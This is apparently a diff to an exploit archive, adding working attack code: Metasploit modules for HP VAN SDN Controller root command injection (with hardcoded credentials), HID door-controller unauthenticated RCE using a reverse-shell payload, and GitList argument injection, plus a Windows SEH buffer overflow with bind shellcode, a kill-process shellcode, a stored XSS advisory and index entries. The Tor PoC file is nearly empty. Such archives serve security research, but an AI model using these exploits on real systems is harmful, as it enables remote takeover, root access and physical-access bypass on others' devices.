diff --git a/exploits/linux/dos/44994.html b/exploits/linux/dos/44994.html new file mode 100644 index 000000000..900743d93 --- /dev/null +++ b/exploits/linux/dos/44994.html @@ -0,0 +1,30 @@ +# Exploit Title: Tor Browser - Use After Free (PoC) +# Date: 09.07.2018 +# Exploit Author: t4rkd3vilz +# Vendor Homepage: https://www.torproject.org/ +# Software Link: https://www.torproject.org/download/download-easy.html.en +# Version: Tor 0.3.2.x before 0.3.2.10 +# Tested on: Kali Linux +# CVE : CVE-2018-0491 + +#Run exploit, result DOS + + + + +veryhandsome jameel naboo + + \ No newline at end of file diff --git a/exploits/linux/remote/44991.rb b/exploits/linux/remote/44991.rb new file mode 100755 index 000000000..0f9124dd5 --- /dev/null +++ b/exploits/linux/remote/44991.rb @@ -0,0 +1,197 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + # server: grizzly/2.2.16 + HttpFingerprint = {pattern: [/^grizzly/]} + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP VAN SDN Controller Root Command Injection', + 'Description' => %q{ + This module exploits a hardcoded service token or default credentials + in HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root. + + A root command injection was discovered in the uninstall action's name + parameter, obviating the need to use sudo for privilege escalation. + + If the service token option TOKEN is blank, USERNAME and PASSWORD will + be used for authentication. An additional login request will be sent. + }, + 'Author' => [ + 'Matt Bergin', # Vulnerability discovery and Python exploit + 'wvu' # Metasploit module and additional ~research~ + ], + 'References' => [ + ['EDB', '44951'], + ['URL', 'https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt'] + ], + 'DisclosureDate' => 'Jun 25 2018', + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_X86, ARCH_X64], + 'Privileged' => true, + 'Targets' => [ + ['Unix In-Memory', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'Payload' => {'BadChars' => ' '} + ], + ['Linux Dropper', + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :linux_dropper + ] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => {'RPORT' => 8081, 'SSL' => true} + )) + + register_options([ + OptString.new('TOKEN', [false, 'Service token', 'AuroraSdnToken37']), + OptString.new('USERNAME', [false, 'Service username', 'sdn']), + OptString.new('PASSWORD', [false, 'Service password', 'skyline']) + ]) + + register_advanced_options([ + OptString.new('PayloadName', [false, 'Payload name (random if unset)']), + OptBool.new('ForceExploit', [false, 'Override check result', false]) + ]) + end + + def check + checkcode = CheckCode::Safe + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => '/', + 'headers' => {'X-Auth-Token' => auth_token}, + 'ctype' => 'application/json', + 'data' => {'action' => 'uninstall'}.to_json + ) + + if res.nil? + checkcode = CheckCode::Unknown + elsif res && res.code == 400 && res.body.include?('Missing field: name') + checkcode = CheckCode::Appears + elsif res && res.code == 401 && res.body =~ /Missing|Invalid token/ + checkcode = CheckCode::Safe + end + + checkcode + end + + def exploit + if [CheckCode::Safe, CheckCode::Unknown].include?(check) + if datastore['ForceExploit'] + print_warning('ForceExploit set! Exploiting anyway!') + else + fail_with(Failure::NotVulnerable, 'Set ForceExploit to override') + end + end + + if target['Type'] == :unix_memory + print_status('Executing command payload') + execute_command(payload.encoded) + return + end + + print_status('Uploading payload as fake .deb') + payload_path = upload_payload + renamed_path = payload_path.gsub(/\.deb$/, '') + + register_file_for_cleanup(renamed_path) + + print_status('Renaming payload and executing it') + execute_command( + "mv #{payload_path} #{renamed_path} && " \ + "chmod +x #{renamed_path}" + ) + execute_command(renamed_path) + end + + def upload_payload + payload_name = datastore['PayloadName'] ? + "#{datastore['PayloadName']}.deb" : + "#{Rex::Text.rand_text_alphanumeric(8..42)}.deb" + payload_path = "/var/lib/sdn/uploads/#{payload_name}" + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => '/upload', + 'headers' => {'Filename' => payload_name, 'X-Auth-Token' => auth_token}, + 'ctype' => 'application/octet-stream', + 'data' => generate_payload_exe + ) + + unless res && res.code == 200 && res.body.include?('{ }') + fail_with(Failure::UnexpectedReply, "Failed to upload #{payload_path}") + end + + print_good("Uploaded #{payload_path}") + + payload_path + end + + def execute_command(cmd) + # Argument injection in /opt/sdn/admin/uninstall-dpkg + injection = "--pre-invoke=#{cmd}" + + # Ensure we don't undergo word splitting + injection = injection.gsub(/\s+/, '${IFS}') + + print_status("Injecting dpkg -r #{injection}") + + send_request_cgi({ + 'method' => 'POST', + 'uri' => '/', + 'headers' => {'X-Auth-Token' => auth_token}, + 'ctype' => 'application/json', + 'data' => {'action' => 'uninstall', 'name' => injection}.to_json + }, 1) + end + + def auth_token + return @auth_token if @auth_token + + token = datastore['TOKEN'] + username = datastore['USERNAME'] + password = datastore['PASSWORD'] + + if token && !token.empty? + print_status("Authenticating with service token #{token}") + @auth_token = token + return @auth_token + end + + print_status("Authenticating with creds #{username}:#{password}") + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => '/sdn/ui/app/login', + 'rport' => 8443, + 'vars_post' => {'username' => username, 'password' => password} + ) + + unless res && res.get_cookies.include?('X-Auth-Token') + print_error('Invalid username and/or password specified') + return + end + + @auth_token = res.get_cookies_parsed['X-Auth-Token'].first + print_good("Retrieved auth token #{@auth_token}") + + @auth_token + end + +end \ No newline at end of file diff --git a/exploits/linux/remote/44992.rb b/exploits/linux/remote/44992.rb new file mode 100755 index 000000000..719db58bc --- /dev/null +++ b/exploits/linux/remote/44992.rb @@ -0,0 +1,191 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Udp + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HID discoveryd command_blink_on Unauthenticated RCE', + 'Description' => %q{ + This module exploits an unauthenticated remote command execution + vulnerability in the discoveryd service exposed by HID VertX and Edge + door controllers. + + This module was tested successfully on a HID Edge model EH400 + with firmware version 2.3.1.603 (Build 04/23/2012). + }, + 'Author' => + [ + 'Ricky "HeadlessZeke" Lawshae', # Discovery + 'coldfusion39', # VertXploit + 'Brendan Coles' # Metasploit + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_ARMLE, + 'Privileged' => true, + 'References' => + [ + ['ZDI', '16-223'], + ['URL', 'https://blog.trendmicro.com/let-get-door-remote-root-vulnerability-hid-door-controllers/'], + ['URL', 'http://nosedookie.blogspot.com/2011/07/identifying-and-querying-hid-vertx.html'], + ['URL', 'https://exfil.co/2016/05/09/exploring-the-hid-eh400/'], + ['URL', 'https://github.com/lixmk/Concierge'], + ['URL', 'https://github.com/coldfusion39/VertXploit'] + ], + 'DisclosureDate' => 'Mar 28 2016', + 'DefaultOptions' => + { + 'WfsDelay' => 30, + 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', + 'CMDSTAGER::FLAVOR' => 'echo' + }, + 'Targets' => [['Automatic', {}]], + 'CmdStagerFlavor' => 'echo', # wget is available, however the wget command is too long + 'DefaultTarget' => 0)) + register_options [ Opt::RPORT(4070) ] + end + + def check + connect_udp + udp_sock.put 'discover;013;' + res = udp_sock.get(5) + disconnect_udp + + if res.to_s.eql? '' + vprint_error 'Connection failed' + return CheckCode::Unknown + end + + hid_res = parse_discovered_response res + if hid_res[:mac].eql? '' + vprint_error 'Malformed response' + return CheckCode::Safe + end + + @mac = hid_res[:mac] + + vprint_good "#{rhost}:#{rport} - HID discoveryd service detected" + vprint_line hid_res.to_s + report_service( + host: rhost, + mac: hid_res[:mac], + port: rport, + proto: 'udp', + name: 'hid-discoveryd', + info: hid_res + ) + + if hid_res[:version].to_s.eql? '' + vprint_error "#{rhost}:#{rport} - Could not determine device version" + return CheckCode::Detected + end + + # Vulnerable version mappings from VertXploit + vuln = false + version = Gem::Version.new(hid_res[:version].to_s) + case hid_res[:model] + when 'E400' # EDGEPlus + vuln = true if version <= Gem::Version.new('3.5.1.1483') + when 'EH400' # EDGE EVO + vuln = true if version <= Gem::Version.new('3.5.1.1483') + when 'EHS400' # EDGE EVO Solo + vuln = true if version <= Gem::Version.new('3.5.1.1483') + when 'ES400' # EDGEPlus Solo + vuln = true if version <= Gem::Version.new('3.5.1.1483') + when 'V2-V1000' # VertX EVO + vuln = true if version <= Gem::Version.new('3.5.1.1483') + when 'V2-V2000' # VertX EVO + vuln = true if version <= Gem::Version.new('3.5.1.1483') + when 'V1000' # VertX Legacy + vuln = true if version <= Gem::Version.new('2.2.7.568') + when 'V2000' # VertX Legacy + vuln = true if version <= Gem::Version.new('2.2.7.568') + else + vprint_error "#{rhost}:#{rport} - Device model was not recognized" + return CheckCode::Detected + end + + vuln ? CheckCode::Appears : CheckCode::Safe + end + + def send_command(cmd) + connect_udp + + # double escaping for echo -ne stager + encoded_cmd = cmd.gsub("\\", "\\\\\\") + + # packet length (max 44) + len = '044' + + # of times to blink LED, if the device has a LED; else + # second to beep (very loudly) if the device does not have a LED + num = -1 # no beep/blink ;) + + # construct packet + req = '' + req << 'command_blink_on;' + req << "#{len};" + req << "#{@mac};" + req << "#{num}`#{encoded_cmd}`;" + + # send packet + udp_sock.put req + res = udp_sock.get(5) + disconnect_udp + + unless res.to_s.start_with? 'ack;' + fail_with Failure::UnexpectedReply, 'Malformed response' + end + end + + def execute_command(cmd, opts) + # the protocol uses ';' as a separator, + # so we issue each system command separately. + # we're using the echo command stager which hex encodes the payload, + # so there's no risk of replacing any ';' characters in the payload data. + cmd.split(';').each do |c| + send_command c + end + end + + def exploit + print_status "#{rhost}:#{rport} - Connecting to target" + + check_code = check + unless check_code == CheckCode::Appears || check_code == CheckCode::Detected + fail_with Failure::Unknown, "#{rhost}:#{rport} - Target is not vulnerable" + end + + # linemax is closer to 40, + # however we need to account for additinal double escaping + execute_cmdstager linemax: 30, :temp => '/tmp' + end + + def parse_discovered_response(res) + info = {} + + return unless res.start_with? 'discovered' + + hid_res = res.split(';') + return unless hid_res.size == 9 + return unless hid_res[0] == 'discovered' + return unless hid_res[1].to_i == res.length + + { + :mac => hid_res[2], + :name => hid_res[3], + :ip => hid_res[4], + # ? => hid_res[5], # '1' + :model => hid_res[6], + :version => hid_res[7], + :version_date => hid_res[8] + } + end +end \ No newline at end of file diff --git a/exploits/php/remote/44993.rb b/exploits/php/remote/44993.rb new file mode 100755 index 000000000..21f04cbe3 --- /dev/null +++ b/exploits/php/remote/44993.rb @@ -0,0 +1,67 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "GitList v0.6.0 Argument Injection Vulnerability", + 'Description' => %q{ + This module exploits an argument injection vulnerability in GitList v0.6.0. + The vulnerability arises from GitList improperly validating input using the php function + 'escapeshellarg'. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Kacper Szurek', # EDB POC + 'Shelby Pace' # Metasploit Module + ], + 'References' => + [ + [ 'EDB', '44548' ], + [ 'URL', 'https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html'] + ], + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'GitList v0.6.0', { } ] + ], + 'Privileged' => false, + 'Payload' => { 'BadChars' => '\'"' }, + 'DisclosureDate' => "Apr 26 2018", + 'DefaultTarget' => 0)) + end + + def check + uri = normalize_uri(target_uri.path, '/gitlist/') + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri + ) + + if res && res.code == 200 && /Powered by .*GitList 0\.6\.0/.match(res.body) + return Exploit::CheckCode::Appears + end + + Exploit::CheckCode::Safe + end + + def exploit + postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search') + cmd = '--open-files-in-pager=php -r "eval(\\"' + cmd << payload.encoded + cmd << '\\");"' + send_request_cgi( + 'method' => 'POST', + 'uri' => postUri, + 'vars_post' => { 'query' => cmd } + ) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/44988.txt b/exploits/php/webapps/44988.txt new file mode 100644 index 000000000..b98a00a34 --- /dev/null +++ b/exploits/php/webapps/44988.txt @@ -0,0 +1,32 @@ +###################### +# Author Information # +###################### +Author : Ahmed Elhady Mohamed +twitter : @Ahmed__ELhady +Date : 01/07/2018 +######################## +# Software Information # +######################## +Affected Software : SeoChecker Umbraco CMS Plug-in +Version: version 1.9.2 +Software website : https://soetemansoftware.nl/seo-checker + +############### +# Description # +############### +SeoChecker Umbraco CMS Plug-in version 1.9.2 is vulnerable to stored cross-site scripting vulnerability in two parameters +which are SEO title and SEO description HTML parameters fields. A low privilege authenticated user who can edit the SEO tab +parameter value for any Ubmraco CMS content like an article will be able to inject a malicious code to execute arbitrary HTML +and JS code in a user's browser session in the context of an affected site. so when a high privilege user tries to access/edit +the article content. the JS code will be executed. The vulnerabilities are tested on 1.9.2 version and Other versions may also be affected. + + +################# +# Exlpoit Steps # +################# +1- Access the application with a low privilege authenticated user +2- Go to the SEO tab for any article +3-Enter the following payload in SEO title and SEO description HTML parameters fields parameters +"> +4- Access the article content page to edit and change contents value. +5- The JS code will be executed. \ No newline at end of file diff --git a/exploits/windows/local/44989.py b/exploits/windows/local/44989.py new file mode 100755 index 000000000..dabd40864 --- /dev/null +++ b/exploits/windows/local/44989.py @@ -0,0 +1,55 @@ +# Exploit Title: Boxoft wav-wma Converter - Local Buffer Overflow (SEH) +# Date: 2018-07-08 +# Software Link: http://www.boxoft.com/wav-to-wma/ +# Software Version:1.0 +# Exploit Author: Achilles +# Target: Windows 7 x64 +# CVE: +# Description: A malicious .wav file cause this vulnerability. +# Category: Local Exploit + +buffer = "A" * 4132 +buffer+= "\x90\x90\xeb\x06" #jmp short 6 +buffer+= "\x34\x14\x40\x00" # pop pop retn +buffer+= "\x90" * 20 +buffer+= ("\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33" #Bind shellcode port 4444 +"\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79" +"\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75" +"\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca" +"\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4" +"\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac" +"\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf" +"\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1" +"\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2" +"\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a" +"\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f" +"\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda" +"\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e" +"\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99" +"\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e" +"\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19" +"\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57" +"\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c" +"\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5" +"\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86" +"\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8" +"\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a" +"\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3" +"\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69" +"\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89" +"\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2" +"\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9" +"\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67" +"\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24" +"\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60" +"\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75" +"\xc8\x28\x1b\xd5\x3f\x51") + +try: + f=open("Evil.wav","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/remote/44987.txt b/exploits/windows/remote/44987.txt new file mode 100644 index 000000000..a69942b10 --- /dev/null +++ b/exploits/windows/remote/44987.txt @@ -0,0 +1,16 @@ +# Exploit Title: Stack-based buffer overflow in Activision Infinity Ward Call of Duty Modern Warfare 2 +# Date: 14-12-2017 +# Exploit Author: Maurice Heumann +# Contact: https://twitter.com/momo5502?lang=en +# Website: https://momo5502.com/ +# CVE: CVE-2018-10718 +# Category: webapps + +1. Description + +By sending a crafted network packet, it's possible construct a stack +overflow in Call of Duty: Modern Warfare (amongst other versions). + +2. Proof of Concept + +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44987.zip \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 813259b06..07951462d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6012,6 +6012,7 @@ id,file,description,date,author,type,platform,port 44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux, 44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80 44972,exploits/linux/dos/44972.py,"openslp 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux, +44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9805,6 +9806,7 @@ id,file,description,date,author,type,platform,port 44971,exploits/windows/local/44971.rb,"Boxoft WAV to MP3 Converter 1.1 - Buffer Overflow (Metasploit)",2018-07-03,Metasploit,local,windows, 44983,exploits/hardware/local/44983.txt,"ADB Broadband Gateways / Routers - Local Root Jailbreak",2018-07-05,"SEC Consult",local,hardware, 44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware, +44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16599,6 +16601,10 @@ id,file,description,date,author,type,platform,port 44968,exploits/windows/remote/44968.rb,"FTPShell Client 6.70 (Enterprise Edition) - Stack Buffer Overflow (Metasploit)",2018-07-02,Metasploit,remote,windows, 44969,exploits/linux/remote/44969.rb,"Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit)",2018-07-02,Metasploit,remote,linux,80 44985,exploits/windows/remote/44985.c,"PolarisOffice 2017 8 - Remote Code Execution",2018-07-06,hyp3rlinx,remote,windows, +44987,exploits/windows/remote/44987.txt,"Activision Infinity Ward Call of Duty Modern Warfare 2 - Buffer Overflow",2018-07-09,"Maurice Heumann",remote,windows, +44991,exploits/linux/remote/44991.rb,"HP VAN SDN Controller - Root Command Injection (Metasploit)",2018-07-09,Metasploit,remote,linux,8081 +44992,exploits/linux/remote/44992.rb,"HID discoveryd - command_blink_on Unauthenticated RCE (Metasploit)",2018-07-09,Metasploit,remote,linux,4070 +44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39629,3 +39635,4 @@ id,file,description,date,author,type,platform,port 44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php, 44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80 44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80 +44988,exploits/php/webapps/44988.txt,"Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting",2018-07-09,"Ahmed Elhady Mohamed",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index fcc18ea0f..05f42857c 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -893,3 +893,4 @@ id,file,description,date,author,type,platform 44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm 44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm 44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86 +44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86 diff --git a/shellcodes/linux_x86/44990.c b/shellcodes/linux_x86/44990.c new file mode 100644 index 000000000..e88358fac --- /dev/null +++ b/shellcodes/linux_x86/44990.c @@ -0,0 +1,33 @@ +/* + Exploit Title: Kill PID shellcode + Date: 07/09/2018 + Exploit Author: Nathu Nandwani + Platform: Linux/x86 + Size: 20 bytes + Compile: gcc -fno-stack-protector -z execstack killproc.c -o killproc +*/ +#include +#include +int main() +{ + unsigned short pid = 2801; + + char shellcode[] = + "\x31\xc0" /* xor eax, eax */ + "\xb0\x25" /* mov al, 0x25 - SYS_KILL */ + "\x89\xc3" /* mov ebx, eax */ + "\x89\xc1" /* mov ecx, eax */ + "\x66\xbb" /* mov bx, ? */ + "\xF1\x0A" /* bx <= pid => 2801 = 0x0AF1 */ + "\xb1\x09" /* mov cl, 0x09 - SIGKILL */ + "\xcd\x80" /* int 0x80 */ + "\xb0\x01" /* mov al, 0x01 */ + "\xcd\x80"; /* int 0x80 */ + + shellcode[10] = pid & 0xff; + shellcode[11] = (pid >> 8) & 0xff; + + printf("Shellcode length: %d\n", strlen(shellcode)); + int (*ret)() = (int(*)())shellcode; + ret(); +} \ No newline at end of file